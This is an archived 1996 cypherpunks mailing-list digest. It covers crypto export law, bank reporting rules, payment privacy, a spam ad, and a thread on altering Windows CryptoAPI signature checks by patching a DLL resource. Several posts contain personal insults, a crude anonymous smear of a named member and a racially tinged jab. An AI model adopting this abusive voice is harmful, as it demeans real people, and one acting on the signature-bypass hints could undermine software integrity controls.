Date: Wed, 25 Dec 1996 14:26:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Internet Message
Message-ID: <199612252203.RAB23812@mime4.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain



  Sorry I wasn't able obtain the original SUBJECT here.

     Through-out the moral existance of the internet I find 
no reason to stop the comunications. There are factors like 
no AT&T, MCI, or SPRINT (those dime-a-minute rates are
baffling). GOOD. Then there are more ideas exchanged. This
can be a PLUS for businesses that are RETAILERS (in the long 
run). The internet can be used to UNITE the world with a
single language. The internet can be used to share ideas,
learn, and a good place to visit when you are feeling down. 

    Now if you believe anything I said, than the idea that
the iternet brings is UNITY. Isn't it strange that within
the last 3 years, (taken from a local news channel) people
have agreed that the U.S. is moving in a positive direction? 
Not really, within these last three years is the exact time 
the internet had become most publicly available. With
PRODIGY, AOL, and COMPUSERVE making it happen. Who is the
original credit due to?
Tell me.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
my favorite site:
http://pages.prodigy.com/VT/hackersguide
on the internet today.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

      --Nathan 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 25 Dec 1996 14:20:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Gubmint-sponsored online gambling
Message-ID: <78iiZD104w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


In about 2 weeks Off-track Betting Corporation (the quasi-state agency
in NYS that's in charge of horse betting) is planning to open a Web site
where gamblers will be able to place bets.

One will have to fork over real $$ to OTB before being able to bet it
on the Web site.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 25 Dec 1996 15:00:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <199612251920.LAA31394@slack.lne.com>
Message-ID: <XLkiZD105w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray <ericm@lne.com> writes:
> This is really scary to someone like me who doesn't often read
> laws.  They're required to report "suspicious" transactions
> (with the definition of "suspicious" left completely wide open)
> and they're not allowed to tell you that you have been reported.
> This sounds like police-state tactics, not something that would
> happen in a free and open society.

Yes - that's what the U.S. is.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: varange@crl.com (Troy Varange)
Date: Wed, 25 Dec 1996 17:54:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cash - Covenience and privacy over the threat of being mugged
In-Reply-To: <$m2n5850-.Pine.OS2.3.95.961222151556.7261A-100000@klinzhai.nanticoke.net>
Message-ID: <Love@23715>
MIME-Version: 1.0
Content-Type: text/plain


> It's that wonderful season again, when all the assholes
> are out in force, and people feel obligated to purchase
> merchandise to give to each other.  For various reasons,
> I don't believe in credit cards, and yet, trying to pay for
> something by personal check at the local Hecht's, they either
> *require* a credit card, or go through the Nazi check-warranty
> company Equifax.

Why not just carry sufficient cash for your purchasing needs?

Irrational fear of muggers I guess is the primary reason not
to carry around, say, $500.00 cash.  But if you were mugged
for that much, wouldn't you feel worse about the mugging
itself than the actual loss of the money?  I doubt the mere
carrying of greater amounts of cash makes someone more likely
to be mugged than someone carrying nothing.  So it boils down
to whether you think it's better to use the inconvenience and
invasion of privacy of credit cards and/or checks and getting
them stolen over convenience and privacy of cash and getting
an anonymous $500.00 cash stolen.

(You also can *sign* your cash to help trace thefts.  I used to
do this when hanging around disreputable charactors.  Hell,
drug dealers will accept your money if you wrote down his
identification and "Crack Bill of Sale" in magic marker on
every bill.)

> Is it legal to require credit cards?

Yes.

BTW, my uncle was mugged at Provo Park for thirty five
cents and my front windshield of my car was smashed in for
the fifty cents in open view between the passenger seats.
You know those ancient mono AM only radios that are almost
always broken down in old cars?  Yep, had a window smashed and
the worthless radio stolen.  In another vehicle that was even
shittier looking I never locked the doors and nothing was ever
stolen; the radio and cassette player actually worked!

Merry bloody crassmus.

-- 
Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 25 Dec 1996 15:58:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Encryption Algorithms
In-Reply-To: <199612251907.OAA18540@homeport.org>
Message-ID: <32C1D894.378@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
 >  (If any cypherpunks still give a shit about crypto I would
appreciate
 >any pointers to additional crypto resources on the net.)
 
    Crypto?
    Get off the CypherPunks Ebonics forum, you asshole.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 25 Dec 1996 19:03:25 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <199612250205.SAA17605@mail.pacifier.com>
Message-ID: <32C1EAA4.1EBA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> At 03:29 PM 12/24/96 -0500, Brian Davis wrote:
> >On Tue, 24 Dec 1996, Dale Thorn wrote:

[snip]

In one of these posts there was a reference to large amounts of small
change (specifically pennies) being legal tender...

When my dad ran a bread truck in the 1950's, a mafia character who had
a bad day paid him $20 or so in pennies, and my dad said he took it with
little argument.  However, I have heard from a few places years ago that
pennies over a certain quantity may be refused as not legal tender.

There were posts here which suggested that cash of any kind may not have
to be accepted under certain conditions.  I wish this was clearer, or I
could know for sure if these were gray areas, at least in certain
jurisdictions....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter <corbeau@corbeau.seanet.com>
Date: Wed, 25 Dec 1996 20:20:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legality of requiring credit cards? (fwd)
Message-ID: <3.0.32.19961224215351.00af0034@pop.seanet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:51 PM 12/23/96 -0500, you wrote:
> Equifax does business by tracking reputations, as do all credit
> reporting companies. That's how a free market handles bad checks.

Even worse is an outfit called Telecheck.  All they do is see if you have a
listed telephone number.  Since I do not give out my telephone number, and
it is unlisted, an autobody shop refused to accept my check, and I ended up
having to use a credit card.  The idiot teller refused to call the bank to
check my balance.  What does a listed telephone number have to do with
ability to pay?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 25 Dec 1996 21:25:24 -0800 (PST)
To: Greg Broiles <cryptography@c2.net
Subject: Re: Reflections on the Bernstein ruling
Message-ID: <199612260525.VAA20766@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 PM 12/20/96 -0800, Greg Broiles wrote:
>
>(Please keep in mind that I'm not a lawyer yet, and that my comments are
>intended only as the reflections of an amateur and are intended as
>discussion fodder, not legal advice.)
>
>Folks seem to be very excited about Judge Patel's ruling in the Bernstein
>case - and with good reason. It was, for example, a first-page
>above-the-fold item in both of the Bay Area's legal newspapers today.
>Unfortunately, most of the media reports have done a poor job of
>interpreting the ruling, and it's easy to draw bad conclusions from erratic
>news reports about the case. The decision is available online
><http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/961206.decision>
>thanks to the folks at EFF. I thought list members might appreciate a
>summary of the decision and its potential effects.


Please comment on my (layman's) proposal that no "mens rea" ("guilty mind") can be 
attributed to a person who is relying on a not-yet-overturned judicial 
decision.  In other words, if a person has a genuine belief that what he's 
doing has been upheld by the Patel ruling, he cannot be claimed to have had 
"mens rea."  (I am presuming, here, that before he does anything, he "clears 
it" with a lawyer who assures him that what he's planning is at least 
covered in the Patel decision as being okay.  I understand, of course, that 
"mens rea" may be irrelevant in CIVIL REGULATORY issues, but not in CRIMINAL ones.)

>1. What the ruling said
>In brief, Judge Patel ruled that Category XIII(b) (the category which
>refers to cryptographic equipment/software) is unconstitutional because it
>functions as a prior restraint upon speech without providing important
>procedural safeguards which are required when a prior restraint scheme is
>put into place. She ruled that the "technical data" provision of the ITAR
>is also unconstitutional when it refers to technical data about Category
>XIII(b) items because of the lack of procedural safeguards.
>
>Mopping up other points raised by the suit, Judge Patel ruled that the term
>"defense article" as defined in 22 CFR 120.6 should be read to elide the
>phrase "or technical data"; and that when interpreted that way, the terms
>"defense article", "defense service", and "technical data" are not
>unconstitutionally vague. She also ruled that the term "export" is not
>unconstitutionally vague, and writes (in 'dicta', which is legalese for
>"offhand comment", e.g., without precedential value but interesting as a
>hint re what's going on in the judge's mind) that placing software on an
>"Internet site" which can be accessed from a foreign country is an export
>for ITAR purposes.

What about leaving a floppy on a sidewalk in Des Moines, Iowa, which might 
be picked up by a wandering foreign tourist who happened nearby?

Sheesh, these judges are real idiots, even when they accidently are coming 
to (mostly) the right conclusion.

However, if being "on the Internet" is automatically presumed to be an 
export, why can't we program using remote-control editors which might, 
someday, be available on the Internet?  (maybe they already are; somewhat 
analogous to the old timesharing computers of yore.  If the underlying files 
were kept overseas, modified by specific editing commands sent to a remote 
system, presumably Patel's dicta would suggest that those files were never 
"exported" per se.  They were formed and kept overseas, INTENTIONALLY, to 
avoid the later necessity of exporting them had they been kept in the US.)  
This would be an modifed and automated version of the way versions of PGP 
later than 1.0 were supposed to have been developed:  Actual coding was done 
overseas, based on suggestions and comments from other countries.  
(including, presumably, the US.)

Yes, realize that pessimism overtakes me here.  "The system" never wants to 
admit a contradiction.  I would argue, however, that whereever the system 
wishes to draw the line and call everything outside the line "an export," 
that decision should be considered binding on the government even when such 
a conclusion leads to unexpected and undesireable consequences.  (for the 
government, at least...)


>She also ruled that the "fundamental research in science and engineering"
>(120.11(8)) and "general scientific, mathematical, or engineering
>principles" (120.10(5)) exceptions to the definition of "technical data"
>are void because they are too vague. As far as I can tell, they are thus no
>longer available to potential ITAR defendants.

Wouldn't it be more accurate to say that they are no longer considered 
precisely defined exceptions, NOT that the exceptions no longer exist?  

It seems to me that if the "burden of non-ambiguity" falls on those writing 
the regulations, failure to eliminate ambiguity would have to be resolved in 
favor of tolerating actions that fall into the grey area.  For example, if a 
law was passed that said, "pornographic writing is illegal," and the SC 
later determined that "pornographic" was ambiguously defined, what they 
WOULDN'T do is to make ALL writing illegal!  (which would, obviously, be an 
over-broad restriction, in an of itself.)  Otherwise, what would on the 
surface appear to be a overturning of a law would actually be a _broadening_ 
of it.  

>It's also unclear that Judge Patel's ruling is enough to make export of
>crypto source legal by people/organizations located even in the Northern
>District of CA. Venue is proper, in an ITAR case, in any jurisdiction which
>the defense articles have moved through. (18 USC 3237(a); _US v. Durrani_
>659 F.Supp 1177, 1182 (D. Conn, 1987); an easy analogy is to the _US v.
>Thomas_ "Amateur Action" case, where Tennessee venue was proper for
>prosecution of California defendants who sent porn into Tennessee.) So it's
>at least arguable that the feds could simply bring an ITAR prosecution in
>another district, if exported crypto flowed through that district. 


But again, deal with the mens rea issue.  If Patel said, "It's okay to 
export this software because the regulation is invalid," and you do so 
relying on this ruling, wouldn't any subsequent (criminal)  prosecution both 
have to prove you did it, and ALSO prove that you were being unreasonable in 
relying on the ruling?  (Are rulings of illegality somehow more "reasonable" 
than rulings of legality?)

I'm not suggesting that her decision can't be overturned in the future; I'm 
suggesting that until it is overturned, each member the public is entitled 
to act in reliance on it, perhaps at least the ones in her jurisdiction.


>So while the ruling has considerable historical, cultural, and symbolic
>significance, it's dangerous to assume that it means that export
>restrictions on crypto are dead.

However, wouldn't it be a good idea to take advantage of what is at least a 
temporary decision?  If I were a large corporation, having just developed an 
excellent design for a crypto telephone, I might want to export it NOW, 
which is in effect taking advantage of a temporary loosening of restrictions.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 25 Dec 1996 18:40:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Encryption Algorithms
In-Reply-To: <32C1D894.378@sk.sympatico.ca>
Message-ID: <VcViZD108w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson <toto@sk.sympatico.ca> writes:

> Adam Shostack wrote:
>  >  (If any cypherpunks still give a shit about crypto I would
> appreciate
>  >any pointers to additional crypto resources on the net.)
>
>     Crypto?
>     Get off the CypherPunks Ebonics forum, you asshole.

Someone dares discuss crypto???
Cease and desist, or you'll be unsubscrived by John Gilmore
and placed on Timmy May's "do not hire" list.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: health711@cyberpromo.com
Date: Wed, 25 Dec 1996 17:51:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: booklet-bus-97
Message-ID: <cyber3.3>
MIME-Version: 1.0
Content-Type: text/plain


Fuck_You_Nerds,

I just thought I would write you a short
note,to tell you about a free booklet I
discovered.I ordered and I can not believe
the fun and money I am making.All you need
to do is send them a self addressed stamped
envelope to homebusiness 870 market street #450
San Francisco,Calif. 94102.Find it out for
yourself.Available in 34 countries
                              warmest regards & Happy
                                                 Holidays 
                                                   Ellen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 25 Dec 1996 22:09:54 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: [NOT NOISE] Microsoft Crypto Service Provider API
Message-ID: <19961226060647781.AAA212@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Dec 1996 23:17:53 -0500, Blake Coverett wrote:

>And to think MS was good enough to provide an UpdateResource 
>API that I haven't yet had a good reason to use.

Right thoughtful of them, wasn't it..? <g>   

>> Interestingly enough, CSP signatures are held in the registry instead of
>> the binary, necessitating some install procedure for a given CSP.  Not
>> to start rumors, but NT 4.0 does use threads to watch some registry
>> entries that control the version (workstation/server).  Not much of a
>> stretch to imagine a thread that tracks (reports?) changes to
>
>Nope, a little experimentation shows you can change those entries
>while the system is running to your hearts contents.  Try temporarily
>renaming the signature key of the base provider.

Now, yes.  However I wonder how quickly a service pack would be released to
extend the monitor garbage...

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Wed, 25 Dec 1996 09:24:04 -0800 (PST)
To: hash@netropolis.org (Ashish Gulhati)
Subject: Iranian clergic attacks Internet as 'poison' to the masses (fwd)
Message-ID: <199612252246.WAA00230@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


*** Iranian clergic attacks Internet as 'poison' to the masses

A senior Iranian cleric called Friday for restricting Internet access
because the global computer network fed "poison" to the masses.
Ayatollah Ahmad Jannati said the Internet should be restricted to
research and scientific centers and he criticized "unalert and
uncalculating" officials who allowed unrestricted access. He said the
Internet "poisoned thought, morale and attitude" and "was much worse
than food poisoning since 100 doctors put together could not cure such
a case in a short time." For the full text story, see
http://www.merc.com/stories/cgi/story.cgi?id=836683-59b


-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul@pobox.com 	          | - Internet & Intranets 
91 11 2233328                     | - Web Development & PERL 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - (Networked) Multimedia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 25 Dec 1996 23:00:42 -0800 (PST)
To: Eric Murray <bal@martigny.ai.mit.edu (Brian A. LaMacchia)
Subject: Re: Legality of requiring credit cards?
Message-ID: <199612260700.XAA25095@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 AM 12/25/96 -0800, Eric Murray wrote:
>Brian A. LaMacchia writes:
>> 
>> At 09:35 PM 12/24/96 -0800, jim bell wrote:
>> >Bzzt, wrong answer!  By definition, if the report was filed as a
>> consequence of >the transaction, then the transaction was reported IN FACT
>> and the person didn't >evade it!   (whether he wanted to evade it is, of
>> course, pure speculation on your >part.  It is, obviously, questionable
>> whether the government can make a person's >mere _desires_ criminal.)
>> 
>> Please, Jim, *go read the law*.  Do it now, before you even think about
>> replying to this message, else you'll say something else stupid and
>> irrelevant.  Look, I'll even give you the complete, specific URL for the
>> section of the U.S. Code in question; all you have to do is cut-and-paste
>> it into your favorite Web browser:
>> 
>> 	http://www.law.cornell.edu/uscode/31/5324.html
>
>It appears that Jim's 100% wrong- they omit the 'Suspicious
>Transaction' report in the list of reports that the gambler was
>busted for trying to avoid:

Well, I agree that I was "shooting from the hip" on my statement that the 
government doesn't prohibit informing the victim (and yes, such people are 
indeed properly called "victims") that a report was made (see below).  
Imagine that, Jim Bell OVERestimating the ethics of the government!  That'll 
teach me a lesson.


>
>
>Section 5324:
>
>(a) Domestic Coin and Currency Transactions. - No person shall for the
>purpose of evading the reporting requirements of section 5313(a),
>      section 5325, or the regulations issued thereunder or section 5325
>      or regulations prescribed under such section 5325 (FOOTNOTE 1)
>      with respect to such transaction -
>
>      (FOOTNOTE 1) So in original. See 1992 Amendment note below.
>			(1) cause or attempt to cause a domestic financial institution
>            to fail to file a report required under section 5313(a),
>            section 5325, or the regulations issued thereunder or
>            section 5325 or regulations prescribed under such section
>            5325; (FOOTNOTE 1)
>            (2) cause or attempt to cause a domestic financial
>            institution to file a report required under section 5313(a),
>            section 5325, or the regulations issued thereunder or
>            section 5325 or regulations prescribed under such section
>            5325 (FOOTNOTE 1) that contains a material omission or
>            misstatement of fact; or
>			(3) structure or assist in
>            structuring, or attempt to structure or assist in
>            structuring, any transaction with one or more domestic
>            financial institutions.

Notice that they don't define what would constitute an "attempt to cause a 
domestic financial institution to fail to file a report..."  Since from the 
story told, it is obvious that there is no hard-and-fast rule on reporting, 
it should be equally obvious that there is no sure-fire way to prevent a 
report.  As such, equally so, there is no object way to tell (other than, 
say, a direct statement by somebody) that a person's actions were intended 
to avoid a report.


>Section 5313 is the 'normal' reporting section, Section 5318(g)
>is "suspicious" transactions (note that it wasn't listed in 5324 above):
>
>(g) Reporting of Suspicious Transactions. - 
>            (1) In general. - The Secretary may require any financial
>            institution, and any director, officer, employee, or agent
>            of any financial institution, to report any suspicious
>            transaction relevant to a possible violation of law or
>            regulation. 
>
>			(2) Notification prohibited. - A financial
>            institution, and a director, officer, employee, or agent of
>            any financial institution, who voluntarily reports a
>            suspicious transaction, or that reports a suspicious
>            transaction pursuant to this section or any other authority,
>            may not notify any person involved in the transaction that
>            the transaction has been reported.
>
>
>This is really scary to someone like me who doesn't often read
>laws.  They're required to report "suspicious" transactions
>(with the definition of "suspicious" left completely wide open)
>and they're not allowed to tell you that you have been reported.
>This sounds like police-state tactics, not something that would
>happen in a free and open society.


Given that the 1st amendment to the US Constitution supposedly is intended 
to guarantee freedom of speech, any prior restraint on speech must be 
presumed to be unconstitutional unless proved to be constitutional.  Since 
under the circumstances described there is no known crime or ongoing 
investigation, such a prohibition on speech doesn't even rise to the level 
of hypothetical "obstruction of justice" which is occasionally brought up as 
a phony justification for such bans.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 25 Dec 1996 23:01:55 -0800 (PST)
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Legality of requiring credit cards?
Message-ID: <199612260701.XAA25145@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:31 AM 12/26/96 -0500, Brian Davis wrote:
>On Tue, 24 Dec 1996, jim bell wrote:

>> Again, he clearly DID NOT "evade the reporting requirement."  Brian Davis 
>> admitted this. (Whether he ever intended to do this is sheer speculation on 
>> the part of anyone else.  We'll never know; as Davis pointed out, the IRS 
>> screwed up.)   Even if the standard of evidence was as low as 
"preponderance 
>> of evidence" (which it, of course, is not in a criminal case) he SHOULD 
have 
>> won.  By waiting until the return was filed and the tax was paid, the IRS 
>> was allowing him to resolve whatever ambiguity remained.
>
>You misunderstand what the statute intends.  The violation is for 
>attempting to evade *the bank's* requirement to report certain 
>transactions (i.e. >$10K).  He structured the transaction in an effort to 
>keep the bank from complying with the law.

You just admitted that the bank was ready, willing, and able to report the 
tranactions without regard to whether they fit within some specific, fixed 
standard.  That being the case, and presuming somebody was aware enough of 
the practices to realize this (which the lawyer presumably was), then 
there's no evidence that doing what the lawyer did would "keep the bank from 
complying with the law."  (How, exactly, was the lawyer to know whether or 
not any particular action would actually achieve the result you claimed he 
wanted?)

 
>> Actually, if there were any justice, he should have been able to sue the 
>> bank for reporting him and NOT INFORMING HIM of that fact.  (I presume the 
>> law requires the bank to report suspicious transactions.  I also presume 
>> that the law _doesn't_ prohibit the bank from telling the customer that it 
>> will have to report that transaction.) 

Apparently, I presumed wrong.  The thugs are even more thuggish than I had 
imagined.  Whether or not any such prohibition is constitutional is another 
issue, however.  The fact that anybody would attempt to write such a 
restriction into law says a lot about them, however!

>>The bank, presumably being experts 
>> in the matter, recognizes that lay individuals can't be expected to be 
experts 
>> in specialized areas, and should be considered obligated to warn customers 
>> away from suspicious-looking transactions.  I'm sure the REAL LAWYERS (tm) 
>> on this list will be able to cite examples of where experts of all kinds 
>> were sued by non-experts for failing to warn them of unexpected dangers 
that 
>> could have been averted had the appropriate advice been given promptly.
>> 
>So you want the bank to be your nanny? 

I would argue that if the bank can be forced to help the government enforce 
the law, the bank should also become liable for damage done as a consequence 
of complying with such requirements.  While it's a different area, within 
the last few years a decision was made (SC?) that companies which had made 
Agent Orange for the US Government during Vietnam can be held liable 
(without recourse against the government, apparently) for the damages caused 
ex-servicemen for selling dioxin-tained Agent Orange to the government, but 
manufactured totally according to government specifications.  (and used only 
outside the US, under government direction, by government agents, in an 
entirely different legal jurisdiction, to boot!)   Seemingly, doing 
something at the behest of government does not immunize one.



> The guy is a lawyer and had 
>previously been involved in transactions in which such reports had been 
>filed.  What is your explanation for the three 3 $9k check request?  

I have none.  But then again, I don't have to.  Unless "guilty until proven 
innocent" has been adopted as a standard of proof in American courts.  Do 
you know something we don't?

BTW, gambling pools like this are supposed to be illegal, aren't they?  
Isn't it odd when government seems to stop enforcing laws unless it's 
profitable to do so?  




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 25 Dec 1996 20:40:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Vandalism in New York City
Message-ID: <sTZiZD110w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Xmas day vandals overturned 75 headstones in the Calvary Cemetry in Long
Island City, near the residence of Earthweb's associate network administator
Ray "Arsenic" Arachelian.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Wed, 25 Dec 1996 15:28:25 -0800 (PST)
To: cypherpunks@toad.com>
Subject: ABSOLUTE BUNK [was Internet Message]
In-Reply-To: <199612252203.RAB23812@mime4.prodigy.com>
Message-ID: <199612252327.QAA23667@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        every now and then, the southern end of a northbound horse,
    with the creative writing talents of a recent graduate of the State 
    School for the Mentally Deficient, backs into town.

        his favourite site: http://pages.prodigy.com/VT/hackersguide

        somebody ought to tell the poor soul on a horse with no name he 
    aimlessly backed into town lacking the ability to aim.

        the moniker tells it all: BJORN2LUZE
        the origin confirms it: @prodigy.com
        is MALLAMACE an abbreviated anagram for 'malicious mace?'

    but, then again, maybe he sounds intelligent on Prodigy....

        shilling for the apocalypse  

  ==
   Lord grant me the serenity to accept the things I cannot change.
     The courage to change the things I can.
       And the wisdom to hide the bodies of the people 
         I had to kill because they pissed me off.
            --attila

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMsG38L04kQrCC2kFAQFmwAQAg2R4CNgsMnZP/hkoo9XH+cojHbQRmrSl
OXZ7xu13MdzeI4/HQoowRkr+Jm9xkgDAHn6mjrel8Xm5cIM1g/eFpXDpbb+WVhqD
bFg6TtUq/tC4i7gaRjAzDPqA1xqLftmWOouJRDfsq/iqEMNki8bhg2B6xnjNdBm+
sq2WWkRj66k=
=vGcI
-----END PGP SIGNATURE-----

        ====== original ======

on 12/25/96 at 05:03 PM, (NATHAN MALLAMACE) said:

::  Sorry I wasn't able obtain the original SUBJECT here.

::     Through-out the moral existance of the internet I find 
::no reason to stop the comunications. There are factors like 
::no AT&T, MCI, or SPRINT (those dime-a-minute rates are
::baffling). GOOD. Then there are more ideas exchanged. This
::can be a PLUS for businesses that are RETAILERS (in the long 
::run). The internet can be used to UNITE the world with a
::single language. The internet can be used to share ideas,
::learn, and a good place to visit when you are feeling down. 

::    Now if you believe anything I said, than the idea that
::the iternet brings is UNITY. Isn't it strange that within
::the last 3 years, (taken from a local news channel) people
::have agreed that the U.S. is moving in a positive direction? 
::Not really, within these last three years is the exact time 
::the internet had become most publicly available. With
::PRODIGY, AOL, and COMPUSERVE making it happen. Who is the
::original credit due to?
::Tell me.


::-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
::my favorite site:
::http://pages.prodigy.com/VT/hackersguide
::on the internet today.
::-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

::      --Nathan 

    ============ Whew, it's the END of forward ============






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Wed, 25 Dec 1996 20:18:04 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: [NOT NOISE] Microsoft Crypto Service Provider API
Message-ID: <01BBF2B9.DBC67AB0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> Not quite.  The API comes with a program SIGN.EXE that will create a
> "debugging signature" for your CSP, and a new ADVAPI32.DLL, described as
> a "Modified advapi32.dll to load providers that are signed with
> sign.exe."  So the patch point is a bit more accessable than inside the
> kernel.  Maybe the "Modified advapi32.dll" should find its way offshore?

Even better than exporting the hacked advapi32.dll, compare the it 
with the original one.  I'd bet good money that the only difference is
the contents of the RC_DATA/#102 resource attached to the image.
(It's useful to note that the advapi32.dll from versions of NT before
CryptoAPI doesn't have any RC_DATA resources.)

And to think MS was good enough to provide an UpdateResource 
API that I haven't yet had a good reason to use.

> Interestingly enough, CSP signatures are held in the registry instead of
> the binary, necessitating some install procedure for a given CSP.  Not
> to start rumors, but NT 4.0 does use threads to watch some registry
> entries that control the version (workstation/server).  Not much of a
> stretch to imagine a thread that tracks (reports?) changes to

Nope, a little experimentation shows you can change those entries
while the system is running to your hearts contents.  Try temporarily
renaming the signature key of the base provider.

regards,
-Blake





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Thu, 26 Dec 1996 00:51:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Elliptic curves
Message-ID: <199612260811.AAA03540@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C[unt] May styles his facial hair to look more like pubic hair.

    o     o
 --/--   <~\ Tim C[unt] May
 __\    _/\
    \     /





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 25 Dec 1996 21:21:47 -0800 (PST)
To: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <3.0.32.19961224213904.0073acc0@martigny.ai.mit.edu>
Message-ID: <Pine.BSF.3.91.961226001352.4683B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, Brian A. LaMacchia wrote:

> At 05:54 PM 12/24/96 -0800, jim bell wrote:
> >"Man wins $27,000.  He will eventually be required to report and pay taxes 
> >on the amount, but not quite yet.  Stupid I/R/S people alert him BEFORE he 
> >files his taxes.  He reports the payment, as is ostensibly legally required. 
> > He paid the taxes owed.  Period."
> >
> >THEN you said, "we settled the matter."   Huh?  What, exactly, was there to 
> >"settle"?  
> 
> Why, of course, the fact that the guy attempted to structure the
> transaction to evade the reporting requirements in the first place.  31
> U.S.C. 5324(a).  Structuring (or attempting to structure) a financial
> transaction to evade the reporting requirements is a violation of this
> subsection, and 31 U.S.C. 5322(a) says that a willful violation is a
> five-year felony.  Oh, and willful violation while violating another U.S.
> law is a ten-year felony until 5322(b).  I'd suspect the guy was looking at
> a 5322(b) charge (with "transmission of wagering information in interstate
> commerce" as the "other U.S. law" being violated), but IANAL and I don't
> know the case law.
> 
> EBD: Please correct me if I'm wrong.  Oh, and did you go after the guy who
> wrote the three $9K checks for conspiracy or aiding-and-abetting?
> 
> 					--bal

Your answer looks pretty good to me (although I must admit I didn't pull the 
statute once I saw that you replied to Bell's post).  Except that we 
